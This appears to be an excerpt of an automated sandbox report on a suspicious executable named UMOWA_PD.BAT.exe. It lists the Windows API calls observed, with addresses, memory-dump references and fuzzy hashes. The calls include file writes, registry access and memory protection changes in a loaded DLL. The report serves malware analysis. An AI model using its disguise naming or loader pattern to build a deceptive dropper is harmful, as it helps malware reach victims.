                                                                                    • Instruction ID: 3ecce12b6213660a705480fd24811c4b14f3d13bc743ad81d22bf59cde18bc7d
                                                                                    • Opcode Fuzzy Hash: c408762c6ae6a09676534d13277c6868af0c4062816ce02b100207dfef7a20c8
                                                                                    • Instruction Fuzzy Hash: 8DE06D71904208AFDB01ABA5AA498AEB379EB44344B10483FF101B10C0CA794C119A2D
                                                                                    APIs
                                                                                    • SearchPathW.KERNELBASE(?,00000000,?,00000400,?,?,000000FF), ref: 0040174E
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.15203730151.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_UMOWA_PD.jbxd
                                                                                    Similarity
                                                                                    • API ID: PathSearch
                                                                                    • String ID:
                                                                                    • API String ID: 2203818243-0
                                                                                    • Opcode ID: 96c3c64599610033e1741a12b780745032a27335a1d6010ee521e40a3137f023
                                                                                    • Instruction ID: 71d187b5cc8d7de3a3c01a98f906eab562aacc0ad357dac51c0352885440fd59
                                                                                    • Opcode Fuzzy Hash: 96c3c64599610033e1741a12b780745032a27335a1d6010ee521e40a3137f023
                                                                                    • Instruction Fuzzy Hash: D9E04871204104ABE700DB64DD48EAA7778DB5035CF20453AE511A60D1E6B55905971D
                                                                                    APIs
                                                                                    • WriteFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,?,?,0040347F,00000000,00414EC0,?,00414EC0,?,000000FF,00000004,00000000), ref: 004060D7
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.15203730151.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_UMOWA_PD.jbxd
                                                                                    Similarity
                                                                                    • API ID: FileWrite
                                                                                    • String ID:
                                                                                    • API String ID: 3934441357-0
                                                                                    • Opcode ID: 4494c28c6fc58b77f7b94402ffbb10e79d92760fb9961e7d9dbcb201027e3d13
                                                                                    • Instruction ID: de33e43015841e90b47a85578f5cc3acb86098a1fa118a6604a55d69533944a7
                                                                                    • Opcode Fuzzy Hash: 4494c28c6fc58b77f7b94402ffbb10e79d92760fb9961e7d9dbcb201027e3d13
                                                                                    • Instruction Fuzzy Hash: 41E08C3224022AABCF109E508D00EEB3B6CEB003A0F018433FD26E2090D630E83197A4
                                                                                    APIs
                                                                                    • ReadFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,000000FF,?,004034B1,00000000,00000000,00403308,000000FF,00000004,00000000,00000000,00000000), ref: 004060A8
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.15203730151.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_UMOWA_PD.jbxd
                                                                                    Similarity
                                                                                    • API ID: FileRead
                                                                                    • String ID:
                                                                                    • API String ID: 2738559852-0
                                                                                    • Opcode ID: 076a4193e787d8b2f8fcded04b516b0b1a94860d7d4352c54bed072072f3bbd3
                                                                                    • Instruction ID: fd87eb1c4e4509ee71b5dc1f82ee1534a3bbef2287d177a98c1a1ef8e7fccbc0
                                                                                    • Opcode Fuzzy Hash: 076a4193e787d8b2f8fcded04b516b0b1a94860d7d4352c54bed072072f3bbd3
                                                                                    • Instruction Fuzzy Hash: 11E08C3229021AEBDF119E50CC00AEB7BACEB043A0F018436FD22E3180D671E83187A9
                                                                                    APIs
                                                                                    • VirtualProtect.KERNELBASE(6FE2505C,00000004,00000040,6FE2504C), ref: 6FE22A9D
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.15222039276.000000006FE21000.00000020.00000001.01000000.00000004.sdmp, Offset: 6FE20000, based on PE: true
                                                                                    • Associated: 00000000.00000002.15221966825.000000006FE20000.00000002.00000001.01000000.00000004.sdmp
                                                                                    • Associated: 00000000.00000002.15222110605.000000006FE24000.00000002.00000001.01000000.00000004.sdmp
                                                                                    • Associated: 00000000.00000002.15222184730.000000006FE26000.00000002.00000001.01000000.00000004.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_6fe20000_UMOWA_PD.jbxd
                                                                                    Similarity
                                                                                    • API ID: ProtectVirtual
                                                                                    • String ID:
                                                                                    • API String ID: 544645111-0
                                                                                    • Opcode ID: d21249227e261a19582842496aac6cdc1e892ba1e96a6c7e8c89b806dc94b4d6
                                                                                    • Instruction ID: 5dcd21c184a38a714b9ec0f93603e749d7e825d8fac21ca7f8248ab41cf67bc7
                                                                                    • Opcode Fuzzy Hash: d21249227e261a19582842496aac6cdc1e892ba1e96a6c7e8c89b806dc94b4d6
                                                                                    • Instruction Fuzzy Hash: C7F0AEB0904B80DECB50CF2C8E44F193FE2BB1B334B24452AE188D6249FF344464DBA5
                                                                                    APIs
                                                                                    • RegOpenKeyExW.KERNELBASE(00000000,?,00000000,00000000,?,?,00000000,?,0040641C,?,?,?,?,Call,?,00000000), ref: 004063B2
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.15203730151.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_UMOWA_PD.jbxd
                                                                                    Similarity
                                                                                    • API ID: Open
                                                                                    • String ID:
                                                                                    • API String ID: 71445658-0
                                                                                    • Opcode ID: 8ee5b0d2344bda13eae74e7442d869633e0228d129a7f9cdea9876c3f2a2c01f
                                                                                    • Instruction ID: 99177681843bc7d8b33aa39255ce29306f0e35401c43de39655aaedf71f86506
                                                                                    • Opcode Fuzzy Hash: 8ee5b0d2344bda13eae74e7442d869633e0228d129a7f9cdea9876c3f2a2c01f
                                                                                    • Instruction Fuzzy Hash: DAD0173204020DBBDF119E90ED01FAB3B6DAB08350F014826FE06A40A0D776D534ABA8
                                                                                    APIs
                                                                                    • SetFileAttributesW.KERNELBASE(00000000,?,000000F0), ref: 004015B3
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.15203730151.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_UMOWA_PD.jbxd
                                                                                    Similarity
                                                                                    • API ID: AttributesFile
                                                                                    • String ID:
                                                                                    • API String ID: 3188754299-0
                                                                                    • Opcode ID: 58434a7e7cdfb0d0f19199f5504f69f984a7681d240ae9cdceb23cdc370956f4
                                                                                    • Instruction ID: f79479eb79e616cc8aec51f56aa6edc525cb8d4391243906608abe1f76efb7bb
                                                                                    • Opcode Fuzzy Hash: 58434a7e7cdfb0d0f19199f5504f69f984a7681d240ae9cdceb23cdc370956f4
                                                                                    • Instruction Fuzzy Hash: 3DD05B72B08204DBDB01DBE8EA48A9E73B09B50328F20893BD111F11D0D6B9C945A75D
                                                                                    APIs
                                                                                    • SetDlgItemTextW.USER32(?,?,00000000), ref: 004044BA
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.15203730151.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_UMOWA_PD.jbxd
                                                                                    Similarity
                                                                                    • API ID: ItemText
                                                                                    • String ID:
                                                                                    • API String ID: 3367045223-0
                                                                                    • Opcode ID: 9f5f9317995870dd68fcf34551989b3f9c33a874f6e62bdf9e4bbf2fb329bfe5
                                                                                    • Instruction ID: ae2ead1ac10e0797e36fe1c05e7dcabccdaa2022beaf041c85de5a3ae6598913
                                                                                    • Opcode Fuzzy Hash: 9f5f9317995870dd68fcf34551989b3f9c33a874f6e62bdf9e4bbf2fb329bfe5
                                                                                    • Instruction Fuzzy Hash: C9C08C71008200BFD241BB08CC02F1FB3AAEF90325F00C42EB15CA10D2C63595308A26
                                                                                    APIs
                                                                                    • SendMessageW.USER32(?,00000000,00000000,00000000), ref: 004044FE
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.15203730151.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.15203690311.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.15203774032.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.15203830209.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.15203830209.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.15203830209.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.15203830209.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.15203830209.0000000000436000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.15204002987.000000000044C000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Similarity
                                                                                    • API ID: MessageSend
                                                                                    • String ID:
                                                                                    • API String ID: 3850602802-0
                                                                                    APIs
                                                                                    • SendMessageW.USER32(00000028,?,?,00404300), ref: 004044E3
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.15203730151.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    Similarity
                                                                                    • API ID: MessageSend
                                                                                    • String ID:
                                                                                    • API String ID: 3850602802-0
                                                                                    APIs
                                                                                    • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00403247,?), ref: 004034C2
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.15203730151.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    Similarity
                                                                                    • API ID: FilePointer
                                                                                    • String ID:
                                                                                    • API String ID: 973152223-0
                                                                                    APIs
                                                                                    • KiUserCallbackDispatcher.NTDLL(?,00404299), ref: 004044CC
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.15203730151.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    Similarity
                                                                                    • API ID: CallbackDispatcherUser
                                                                                    • String ID:
                                                                                    • API String ID: 2492992576-0
                                                                                    APIs
                                                                                    • VirtualAlloc.KERNELBASE(00000000), ref: 6FE22C57
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.15222039276.000000006FE21000.00000020.00000001.01000000.00000004.sdmp, Offset: 6FE20000, based on PE: true
                                                                                    • Associated: 00000000.00000002.15221966825.000000006FE20000.00000002.00000001.01000000.00000004.sdmp
                                                                                    • Associated: 00000000.00000002.15222110605.000000006FE24000.00000002.00000001.01000000.00000004.sdmp
                                                                                    • Associated: 00000000.00000002.15222184730.000000006FE26000.00000002.00000001.01000000.00000004.sdmp
                                                                                    Similarity
                                                                                    • API ID: AllocVirtual
                                                                                    • String ID:
                                                                                    • API String ID: 4275171209-0
                                                                                    APIs
                                                                                    • Sleep.KERNELBASE(00000000), ref: 004014EA
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.15203730151.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    Similarity
                                                                                    • API ID: Sleep
                                                                                    • String ID:
                                                                                    • API String ID: 3472027048-0
                                                                                    APIs
                                                                                    • GlobalAlloc.KERNELBASE(00000040,?,6FE212DB,?,6FE2137F,00000019,6FE211CA,-000000A0), ref: 6FE212C5
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.15222039276.000000006FE21000.00000020.00000001.01000000.00000004.sdmp, Offset: 6FE20000, based on PE: true
                                                                                    Similarity
                                                                                    • API ID: AllocGlobal
                                                                                    • String ID:
                                                                                    • API String ID: 3761449716-0
                                                                                    APIs
                                                                                    • GetDlgItem.USER32(?,000003FB), ref: 004049E0
                                                                                    • SetWindowTextW.USER32(00000000,?), ref: 00404A0A
                                                                                    • SHBrowseForFolderW.SHELL32(?), ref: 00404ABB
                                                                                    • CoTaskMemFree.OLE32(00000000), ref: 00404AC6
                                                                                    • lstrcmpiW.KERNEL32(Call,00422F08,00000000,?,?), ref: 00404AF8
                                                                                    • lstrcatW.KERNEL32(?,Call), ref: 00404B04
                                                                                    • SetDlgItemTextW.USER32(?,000003FB,?), ref: 00404B16
                                                                                      • Part of subcall function 00405B65: GetDlgItemTextW.USER32(?,?,00000400,00404B4D), ref: 00405B78
                                                                                      • Part of subcall function 004067CF: CharNextW.USER32(?,*?|<>/":,00000000,00434000,76E63420,C:\Users\user\AppData\Local\Temp\,00000000,004034D7,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004037E6,?,00000008,0000000A,0000000C), ref: 00406832
                                                                                      • Part of subcall function 004067CF: CharNextW.USER32(?,?,?,00000000,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00406841
                                                                                      • Part of subcall function 004067CF: CharNextW.USER32(?,00434000,76E63420,C:\Users\user\AppData\Local\Temp\,00000000,004034D7,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004037E6,?,00000008,0000000A,0000000C), ref: 00406846
                                                                                      • Part of subcall function 004067CF: CharPrevW.USER32(?,?,76E63420,C:\Users\user\AppData\Local\Temp\,00000000,004034D7,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004037E6,?,00000008,0000000A,0000000C), ref: 00406859
                                                                                    • GetDiskFreeSpaceW.KERNEL32(00420ED8,?,?,0000040F,?,00420ED8,00420ED8,?,?,00420ED8,?,?,000003FB,?), ref: 00404BD9
                                                                                    • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404BF4
                                                                                      • Part of subcall function 00404D4D: lstrlenW.KERNEL32(00422F08,00422F08,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404DEE
                                                                                      • Part of subcall function 00404D4D: wsprintfW.USER32 ref: 00404DF7
                                                                                      • Part of subcall function 00404D4D: SetDlgItemTextW.USER32(?,00422F08), ref: 00404E0A
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.15203730151.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    Similarity
                                                                                    • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                                                                    • String ID: A$Call
                                                                                    • API String ID: 2624150263-209694386
                                                                                    APIs
                                                                                    • CoCreateInstance.OLE32(004084DC,?,?,004084CC,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 0040222E
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.15203730151.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    Similarity
                                                                                    • API ID: CreateInstance
                                                                                    • String ID:
                                                                                    • API String ID: 542301482-0
                                                                                    APIs
                                                                                    • FindFirstFileW.KERNEL32(00000000,?,00000002), ref: 0040291F
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.15203730151.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_UMOWA_PD.jbxd
                                                                                    Similarity
                                                                                    • API ID: FileFindFirst
                                                                                    • String ID:
                                                                                    • API String ID: 1974802433-0
                                                                                    APIs
                                                                                    • GetDlgItem.USER32(?,000003F9), ref: 00404F25
                                                                                    • GetDlgItem.USER32(?,00000408), ref: 00404F30
                                                                                    • GlobalAlloc.KERNEL32(00000040,?), ref: 00404F7A
                                                                                    • LoadImageW.USER32(0000006E,00000000,00000000,00000000,00000000), ref: 00404F91
                                                                                    • SetWindowLongW.USER32(?,000000FC,0040551A), ref: 00404FAA
                                                                                    • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404FBE
                                                                                    • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404FD0
                                                                                    • SendMessageW.USER32(?,00001109,00000002), ref: 00404FE6
                                                                                    • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404FF2
                                                                                    • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00405004
                                                                                    • DeleteObject.GDI32(00000000), ref: 00405007
                                                                                    • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00405032
                                                                                    • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 0040503E
                                                                                    • SendMessageW.USER32(?,00001132,00000000,?), ref: 004050D9
                                                                                    • SendMessageW.USER32(?,0000110A,00000003,00000110), ref: 00405109
                                                                                      • Part of subcall function 004044D5: SendMessageW.USER32(00000028,?,?,00404300), ref: 004044E3
                                                                                    • SendMessageW.USER32(?,00001132,00000000,?), ref: 0040511D
                                                                                    • GetWindowLongW.USER32(?,000000F0), ref: 0040514B
                                                                                    • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00405159
                                                                                    • ShowWindow.USER32(?,00000005), ref: 00405169
                                                                                    • SendMessageW.USER32(?,00000419,00000000,?), ref: 00405264
                                                                                    • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 004052C9
                                                                                    • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 004052DE
                                                                                    • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00405302
                                                                                    • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00405322
                                                                                    • ImageList_Destroy.COMCTL32(?), ref: 00405337
                                                                                    • GlobalFree.KERNEL32(?), ref: 00405347
                                                                                    • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 004053C0
                                                                                    • SendMessageW.USER32(?,00001102,?,?), ref: 00405469
                                                                                    • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 00405478
                                                                                    • InvalidateRect.USER32(?,00000000,?), ref: 004054A3
                                                                                    • ShowWindow.USER32(?,00000000), ref: 004054F1
                                                                                    • GetDlgItem.USER32(?,000003FE), ref: 004054FC
                                                                                    • ShowWindow.USER32(00000000), ref: 00405503
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.15203730151.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_UMOWA_PD.jbxd
                                                                                    Similarity
                                                                                    • API ID: MessageSend$Window$Image$ItemList_LongShow$Global$AllocCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                                                    • String ID: $M$N
                                                                                    • API String ID: 2564846305-813528018
                                                                                    APIs
                                                                                    • CheckDlgButton.USER32(?,-0000040A,?), ref: 004046FD
                                                                                    • GetDlgItem.USER32(?,000003E8), ref: 00404711
                                                                                    • SendMessageW.USER32(00000000,0000045B,?,00000000), ref: 0040472E
                                                                                    • GetSysColor.USER32(?), ref: 0040473F
                                                                                    • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 0040474D
                                                                                    • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 0040475B
                                                                                    • lstrlenW.KERNEL32(?), ref: 00404760
                                                                                    • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 0040476D
                                                                                    • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 00404782
                                                                                    • GetDlgItem.USER32(?,0000040A), ref: 004047DB
                                                                                    • SendMessageW.USER32(00000000), ref: 004047E2
                                                                                    • GetDlgItem.USER32(?,000003E8), ref: 0040480D
                                                                                    • SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 00404850
                                                                                    • LoadCursorW.USER32(00000000,00007F02), ref: 0040485E
                                                                                    • SetCursor.USER32(00000000), ref: 00404861
                                                                                    • LoadCursorW.USER32(00000000,00007F00), ref: 0040487A
                                                                                    • SetCursor.USER32(00000000), ref: 0040487D
                                                                                    • SendMessageW.USER32(00000111,?,00000000), ref: 004048AC
                                                                                    • SendMessageW.USER32(00000010,00000000,00000000), ref: 004048BE
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.15203730151.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_UMOWA_PD.jbxd
                                                                                    Similarity
                                                                                    • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
                                                                                    • String ID: Call$N
                                                                                    • API String ID: 3103080414-3438112850
                                                                                    APIs
                                                                                    • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                                                                    • BeginPaint.USER32(?,?), ref: 00401047
                                                                                    • GetClientRect.USER32(?,?), ref: 0040105B
                                                                                    • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                                                    • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                                                                    • DeleteObject.GDI32(?), ref: 004010ED
                                                                                    • CreateFontIndirectW.GDI32(?), ref: 00401105
                                                                                    • SetBkMode.GDI32(00000000,?), ref: 00401126
                                                                                    • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                                                    • SelectObject.GDI32(00000000,?), ref: 00401140
                                                                                    • DrawTextW.USER32(00000000,00428A20,000000FF,00000010,00000820), ref: 00401156
                                                                                    • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                                                    • DeleteObject.GDI32(?), ref: 00401165
                                                                                    • EndPaint.USER32(?,?), ref: 0040116E
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.15203730151.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_UMOWA_PD.jbxd
                                                                                    Similarity
                                                                                    • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                                                    • String ID: F
                                                                                    • API String ID: 941294808-1304234792
                                                                                    APIs
                                                                                    • CloseHandle.KERNEL32(00000000,?,00000000,?,?,00000000,?,?,00406302,?,?), ref: 004061A2
                                                                                    • GetShortPathNameW.KERNEL32(?,004265A8,00000400), ref: 004061AB
                                                                                      • Part of subcall function 00405F76: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,0040625B,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405F86
                                                                                      • Part of subcall function 00405F76: lstrlenA.KERNEL32(00000000,?,00000000,0040625B,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FB8
                                                                                    • GetShortPathNameW.KERNEL32(?,00426DA8,00000400), ref: 004061C8
                                                                                    • wsprintfA.USER32 ref: 004061E6
                                                                                    • GetFileSize.KERNEL32(00000000,00000000,00426DA8,C0000000,00000004,00426DA8,?,?,?,?,?), ref: 00406221
                                                                                    • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00406230
                                                                                    • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00406268
                                                                                    • SetFilePointer.KERNEL32(0040A580,00000000,00000000,00000000,00000000,004261A8,00000000,-0000000A,0040A580,00000000,[Rename],00000000,00000000,00000000), ref: 004062BE
                                                                                    • GlobalFree.KERNEL32(00000000), ref: 004062CF
                                                                                    • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 004062D6
                                                                                      • Part of subcall function 00406011: GetFileAttributesW.KERNELBASE(00000003,004030C2,C:\Users\user\Desktop\UMOWA_PD.BAT.exe,80000000,00000003), ref: 00406015
                                                                                      • Part of subcall function 00406011: CreateFileW.KERNELBASE(?,?,?,00000000,?,00000001,00000000), ref: 00406037
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.15203730151.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_UMOWA_PD.jbxd
                                                                                    Similarity
                                                                                    • API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
                                                                                    • String ID: %ls=%ls$[Rename]
                                                                                    • API String ID: 2171350718-461813615
                                                                                    APIs
                                                                                    • GetWindowLongW.USER32(?,000000EB), ref: 00404524
                                                                                    • GetSysColor.USER32(00000000), ref: 00404562
                                                                                    • SetTextColor.GDI32(?,00000000), ref: 0040456E
                                                                                    • SetBkMode.GDI32(?,?), ref: 0040457A
                                                                                    • GetSysColor.USER32(?), ref: 0040458D
                                                                                    • SetBkColor.GDI32(?,?), ref: 0040459D
                                                                                    • DeleteObject.GDI32(?), ref: 004045B7
                                                                                    • CreateBrushIndirect.GDI32(?), ref: 004045C1
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.15203730151.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_UMOWA_PD.jbxd
                                                                                    Similarity
                                                                                    • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                                                    • String ID:
                                                                                    • API String ID: 2320649405-0
                                                                                    • Opcode ID: 9dba601b91aff6ac4bf2e5f3eaee39d76022ea5146a5c84035e03d3d84c8d27c
                                                                                    • Instruction ID: 524417ed32742d4b72cd17798d780815826fd18a7bcb7bb0f1ed1fdd1052d135
                                                                                    • Opcode Fuzzy Hash: 9dba601b91aff6ac4bf2e5f3eaee39d76022ea5146a5c84035e03d3d84c8d27c
                                                                                    • Instruction Fuzzy Hash: B22135B1500705AFCB319F78DD08B577BF5AF81714B048A2DEA96A26E0D738D944CB54
                                                                                    APIs
                                                                                    • CharNextW.USER32(?,*?|<>/":,00000000,00434000,76E63420,C:\Users\user\AppData\Local\Temp\,00000000,004034D7,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004037E6,?,00000008,0000000A,0000000C), ref: 00406832
                                                                                    • CharNextW.USER32(?,?,?,00000000,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00406841
                                                                                    • CharNextW.USER32(?,00434000,76E63420,C:\Users\user\AppData\Local\Temp\,00000000,004034D7,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004037E6,?,00000008,0000000A,0000000C), ref: 00406846
                                                                                    • CharPrevW.USER32(?,?,76E63420,C:\Users\user\AppData\Local\Temp\,00000000,004034D7,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004037E6,?,00000008,0000000A,0000000C), ref: 00406859
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.15203730151.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.15203690311.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.15203774032.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.15203830209.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.15203830209.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.15203830209.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.15203830209.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.15203830209.0000000000436000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.15204002987.000000000044C000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_UMOWA_PD.jbxd
                                                                                    Similarity
                                                                                    • API ID: Char$Next$Prev
                                                                                    • String ID: *?|<>/":$C:\Users\user\AppData\Local\Temp\
                                                                                    • API String ID: 589700163-2977677972
                                                                                    • Opcode ID: d9890b2689dddc4776a4db6af1629ac80bd1bcc56ba6148264ccbff8cf15ab87
                                                                                    • Instruction ID: 2d41fa7b6770246c30beeceb47eb68b435a53440eacd13368e2f30b8c56315d6
                                                                                    • Opcode Fuzzy Hash: d9890b2689dddc4776a4db6af1629ac80bd1bcc56ba6148264ccbff8cf15ab87
                                                                                    • Instruction Fuzzy Hash: A511935680121296DB303B14CC44ABB66E8AF54794F52C03FE999732C1E77C5C9296BD
                                                                                    APIs
                                                                                    • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404E76
                                                                                    • GetMessagePos.USER32 ref: 00404E7E
                                                                                    • ScreenToClient.USER32(?,?), ref: 00404E98
                                                                                    • SendMessageW.USER32(?,00001111,00000000,?), ref: 00404EAA
                                                                                    • SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404ED0
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.15203730151.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.15203690311.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.15203774032.0000000000408000.00000002.00000001.01000000.00000003.sdmp
